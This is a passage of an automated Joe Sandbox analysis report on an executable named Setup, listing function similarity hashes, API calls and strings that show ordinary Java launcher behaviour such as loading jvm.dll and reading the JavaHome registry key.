• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: LibraryLoad$AddressProc$Message
• String ID: Error: Path length exceeds maximum length (PATH_MAX)$J2D_D3D$J2D_D3D_PRELOAD$\bin\awt.dll$\bin\java.dll$\bin\verify.dll$false$preloadD3D$preloadStop$true
• API String ID: 3101497455-3693045609
• Opcode ID: 5a36ed472193ec25cfcea15ef0ae03a46e7eea35b8d27c3ab642bdf1c246a56a
• Instruction ID: 66904c22feac31978e46e3750097efbe299a9fc161764619e244c05902557e81
• Opcode Fuzzy Hash: 5a36ed472193ec25cfcea15ef0ae03a46e7eea35b8d27c3ab642bdf1c246a56a
• Instruction Fuzzy Hash: 00814221A19642E5FA16FF13E4D0AB9A362BF88790FE80135D94E83795EF7CE505C720
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: LibraryLoad
• String ID: CRT path is %s$Error: Path length exceeds maximum length (PATH_MAX)$Error: loading: %s$PRT path is %s$\bin\$\bin\msvcp140.dll$\bin\vcruntime140.dll$\bin\vcruntime140_1.dll$msvcp140.dll$vcruntime140.dll$vcruntime140_1.dll
• API String ID: 1029625771-2662282541
• Opcode ID: 7ae692a7edd89861307a543ce10e74eaf73cecd1090d2a29193a5a2aca219c8b
• Instruction ID: addc22c18df8aa495d93d1a75f723c85699fe0df7877b394e4d0a138069845dc
• Opcode Fuzzy Hash: 7ae692a7edd89861307a543ce10e74eaf73cecd1090d2a29193a5a2aca219c8b
• Instruction Fuzzy Hash: 68510061A18582F2EE12FF12E4D19B9E376FF94348FE45035E94D836A6EE2CE505C720
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: Close$EnumOpen$QueryValue
• String ID: JavaHome$Software\JavaSoft\Java Runtime Environment
• API String ID: 2572215972-2531112370
• Opcode ID: 496ad6ac866e299300a81ee0ee3a9b0d22cb923cfb6ab4ff93528eee10404356
• Instruction ID: 44f49e571725486bcf9b9bac36baf2ffaa6d5a9a5471f8b94b6fbc9a9e7d0ef3
• Opcode Fuzzy Hash: 496ad6ac866e299300a81ee0ee3a9b0d22cb923cfb6ab4ff93528eee10404356
• Instruction Fuzzy Hash: 43518436A19A42E2FA52AF13E4C0ABAE3A5FF85B84F941131ED4D83754EF3CD1058710
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: CloseHandleThread$CodeCreateErrorExitFreeLastLibraryObjectSingleWait_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: J2D_D3D$J2D_D3D_PRELOAD$false$preloadD3D$true
                                                                                                                                                                                                            • API String ID: 2847611408-3397395437
                                                                                                                                                                                                            • Opcode ID: c9f113a99d199f25bf34a784e1bde5df4a05aedc6fa0d44eeea2a721a9ada148
                                                                                                                                                                                                            • Instruction ID: a23b28824e3876704535c2dc96843e4365534ed29834cf6f2fee683b1dccf99e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9f113a99d199f25bf34a784e1bde5df4a05aedc6fa0d44eeea2a721a9ada148
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1415171A09742E5FA15BF13E4C0A78A762AF89790FF84139D90E43795DF3CE404C620
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wprintf$FrequencyPerformanceQuery
                                                                                                                                                                                                            • String ID: %ld micro seconds to load main class$(ZILjava/lang/String;)Ljava/lang/Class;$----%s----$Error: A JNI error has occurred, please check your installation and try again$_JAVA_LAUNCHER_DEBUG$checkAndLoadMain
                                                                                                                                                                                                            • API String ID: 55271498-1016856437
                                                                                                                                                                                                            • Opcode ID: 9840c571dd651118f10d919033ed642a67e18073eee82866058d84f5acd4c250
                                                                                                                                                                                                            • Instruction ID: 245c281ebb1f4b3ac5e426d73466e82c78bbc10db5b485947ca8a8b6739fcbcc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9840c571dd651118f10d919033ed642a67e18073eee82866058d84f5acd4c250
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C317021A09746E1EA02BF17E9809B9E7B4BF45FC4FA84435DD0D57796EE3CE0458320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF764A16AA0: LoadLibraryA.KERNEL32 ref: 00007FF764A16B52
                                                                                                                                                                                                              • Part of subcall function 00007FF764A16AA0: LoadLibraryA.KERNEL32 ref: 00007FF764A16BDC
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,?,00000000,00007FF764A1203F), ref: 00007FF764A16A30
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF764A1203F), ref: 00007FF764A16A51
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,00000000,00007FF764A1203F), ref: 00007FF764A16A64
                                                                                                                                                                                                              • Part of subcall function 00007FF764A16630: MessageBoxA.USER32 ref: 00007FF764A166D2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryLoad$AddressProc$Message
                                                                                                                                                                                                            • String ID: Error: can't find JNI interfaces in: %s$Error: loading: %s$JNI_CreateJavaVM$JNI_GetDefaultJavaVMInitArgs$JVM path is %s
                                                                                                                                                                                                            • API String ID: 3101497455-3810690643
                                                                                                                                                                                                            • Opcode ID: 79dd69b648ba644c4b7c2a443ef5768ea848ab1d085a151d6f22225a751374ea
                                                                                                                                                                                                            • Instruction ID: 78589a1c85a23cc18b9915b7e1b94902f29bd613838a3e0a7936a0068248e96b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79dd69b648ba644c4b7c2a443ef5768ea848ab1d085a151d6f22225a751374ea
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65012E31A09A52E2EE16AF03F5C0A75A371AF45780FE89032D94E87755EE2CE0548320
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1330151763-0
                                                                                                                                                                                                            • Opcode ID: 1799b2f7489431ff5a8b7e6613862bb9637e19e5281c98c62e3c6134856f2460
                                                                                                                                                                                                            • Instruction ID: ce93525ccdadc4a40b437465e5a083fb65424b92aae4021e863aec1c4d148aff
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1799b2f7489431ff5a8b7e6613862bb9637e19e5281c98c62e3c6134856f2460
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDC1DF36B24A42D6EB10EF6AC580AAD7775FB48B98F641229DE2E97394CF38D011D310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: sprintf
                                                                                                                                                                                                            • String ID: -Dapplication.home=%s$-Denv.class.path=%s$-Djava.class.path=$;$CLASSPATH$Error: Could not determine application home.
                                                                                                                                                                                                            • API String ID: 590974362-1246759518
                                                                                                                                                                                                            • Opcode ID: 455d70054afd31d29f76bbff17add01c85bfeebe5bcde5f5dcac02a02daf364e
                                                                                                                                                                                                            • Instruction ID: ed79768bdff4797ab1b6a32fc3daa9dbcaa8e09e662e8b793b1cc44c8749b9d4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 455d70054afd31d29f76bbff17add01c85bfeebe5bcde5f5dcac02a02daf364e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F41B161A29642F1F912FF13E5D19F99361AF99780FE84035ED0E47397EE2CE5068720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                            • Opcode ID: 03835eed2511794ef1806b7f7081e0c12be8bfe6403703d697b9048c26610adb
                                                                                                                                                                                                            • Instruction ID: 658681d362587e0fa08be53f46f583198c543754e9e9d324e24f817ebd7c35c3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 03835eed2511794ef1806b7f7081e0c12be8bfe6403703d697b9048c26610adb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69C1F622A0C786E2E660AF569480ABFF752FB40B90FAC4131DA4D27791DF3DE445E720
                                                                                                                                                                                                            APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A30476
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,strdup,00000002,?,00007FF764A1F6EE,?,?,00000000,00007FF764A1129B), ref: 00007FF764A30534
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,strdup,00000002,?,00007FF764A1F6EE,?,?,00000000,00007FF764A1129B), ref: 00007FF764A305BE
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID: strdup
• API String ID: 2210144848-3162730407
• Opcode ID: 5f6e868cac8767b8cd00cb556661574c3e77d0b1cf669c8e4ef70b47ba6a9909
• Instruction ID: a9675df7a68fe2713ec3ed6f86d786f4c2d0769ce9f0a88d1eda135899392009
• Opcode Fuzzy Hash: 5f6e868cac8767b8cd00cb556661574c3e77d0b1cf669c8e4ef70b47ba6a9909
• Instruction Fuzzy Hash: C981C422E1C602E5F712BF66D4C0ABDA664AB46744FA44131DE0EA379AEF3CA441C330
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C739
• GetLastError.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C747
• LoadLibraryExW.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C771
• FreeLibrary.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C7B7
• GetProcAddress.KERNEL32(?,?,?,00007FF764A1C966,?,?,?,00007FF764A1C658,?,?,00000001,00007FF764A1C375), ref: 00007FF764A1C7C3
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: c93b9afa9378045dd70fb8ef329fe2978787cf993e8feb7acc1572fb472f35fc
• Instruction ID: 99f349d9b8305d278a5a4906cdaf71dc0fab84b9e497eeea4e0bec334e1ecc53
• Opcode Fuzzy Hash: c93b9afa9378045dd70fb8ef329fe2978787cf993e8feb7acc1572fb472f35fc
• Instruction Fuzzy Hash: D531E765A1AA42E1EE13EF039480E75B3A8FF16BA4FA90535DD2D47744EF7CE4408320
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
• Opcode ID: b978a35b7cc1b70b866fd404e3b01f6d9dbae4f0d2cae35a5a8d853d967fe07c
• Instruction ID: 2a5ea72810d87390c08d396d6a6b346ff10ec7da4ce61e6518a498fa92fbce3c
• Opcode Fuzzy Hash: b978a35b7cc1b70b866fd404e3b01f6d9dbae4f0d2cae35a5a8d853d967fe07c
• Instruction Fuzzy Hash: EE118E31A18A41D2F391AF53E984B29A2A4FB88FE4FA04234EA1D87794EF3CD414C750
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 9d1235d08063fd44caa80003cf1faec46bd67c8aa531a05c929fa3fce195626d
• Instruction ID: c2ee55cd24b553d6107d81d9ebe7da5f13b8f3b9c4ac1789387b300e662fc172
• Opcode Fuzzy Hash: 9d1235d08063fd44caa80003cf1faec46bd67c8aa531a05c929fa3fce195626d
• Instruction Fuzzy Hash: A151A632A09602E7DB66EF17E484E79B7A5FB44B88FA08130DE1A47748DF38E941C714
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: Error: loading: %s$JVM_FindClassFromBootLoader$jvm.dll
• API String ID: 1646373207-1240634009
• Opcode ID: 58e78ba51c2ce9807b3a6983860b8e3d0bcbcf34b458af5ae3e2c417ad45fe21
• Instruction ID: acdf9bba655b72d18d153fe604c08168c27616b76747d6bc08288100007bf703
• Opcode Fuzzy Hash: 58e78ba51c2ce9807b3a6983860b8e3d0bcbcf34b458af5ae3e2c417ad45fe21
• Instruction Fuzzy Hash: 56F01920A0EA02F2FE16AF17F9D0AB89272AF487C0FE45034C84D87365FE6CE444C260
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: e5d9057759f63bdc52e77bb7fb25d867f581dcb33219df1bdb630c50641dc064
• Instruction ID: 190ad9b91c05aa45221e8cf7591a182879984cfea2dc80744de7ef594bef544e
• Opcode Fuzzy Hash: e5d9057759f63bdc52e77bb7fb25d867f581dcb33219df1bdb630c50641dc064
• Instruction Fuzzy Hash: 09F05461B19742E1FB566F63E5C5B75A365AF48740FE4143EE50F86164EF2CD488C320
APIs
Memory Dump Source
• Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
• Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
Similarity
• API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
• String ID:
• API String ID: 2067211477-0
• Opcode ID: 64698e641f6a83f300df68712df761b31ff8641ecb0b3257fc353e06f2765ece
• Instruction ID: 37e3031c037cf2310dcddcee9a425a27ca043800f044dc5fa6512eec284a49b4
• Opcode Fuzzy Hash: 64698e641f6a83f300df68712df761b31ff8641ecb0b3257fc353e06f2765ece
• Instruction Fuzzy Hash: 59219F25A0AB46E2FE15FF63E4D097AE3A4AF84B80FAC0435DE0D53755DE3CE4009660
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction ID: 756de1076c493a6ad87b86466f8382184a545e43425763dcb422189a150e2691
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA119B22D1D603A2F6673D56D8C2B75D1D16F543B0EF4063CE66DC62DBEE1C5C404120
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: -
                                                                                                                                                                                                            • API String ID: 3215553584-2547889144
                                                                                                                                                                                                            • Opcode ID: 5d8b498ff22d46dd9de763e561541730bfc51a7d6dba9380d87361669e0e64bf
                                                                                                                                                                                                            • Instruction ID: 3533c1ae01e41215b25531effd31230505f20c184167d6aa0b5b1970389bf77c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d8b498ff22d46dd9de763e561541730bfc51a7d6dba9380d87361669e0e64bf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA12F926F09143E5FB64BE1790D4ABAE297EF50710FEC8132D699632C0DF2CE941A724
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                            • Opcode ID: 4e9d8a715f4867a031d96218218279292efbbfaec0b26f01f49837f156af5202
                                                                                                                                                                                                            • Instruction ID: a0b9203b208d8e1d005f5a74769bc3f9914bbcc49fc5b715a21311bf700cd728
